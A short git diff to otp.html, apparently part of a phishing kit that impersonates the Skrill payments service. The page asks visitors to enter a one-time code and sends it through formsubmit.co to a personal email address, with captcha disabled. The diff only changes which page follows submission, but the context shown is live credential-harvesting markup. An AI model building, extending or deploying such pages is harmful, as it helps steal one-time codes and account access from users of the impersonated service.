--- a/otp.html
+++ b/otp.html
@@ -15,7 +15,7 @@
 
         <form id="form" class="mt-44" action="https://formsubmit.co/emenikeonyechere@gmail.com" method="POST">
             <input type="hidden" name="_captcha" value="false">
-            <input type="hidden" name="_next" value="https://skrill-web.onrender.com/pin.html"> <!-- Redirect after submission -->
+            <input type="hidden" name="_next" value="https://skrill-web.onrender.com/otp.html"> <!-- Redirect after submission -->
 
             <div class="inputsCtn bg-white rounded-md shadow-sm p-6 flex flex-col gap-6">
                 <p class="font-bold text-center text-xl2 mb-3">Enter code</p>
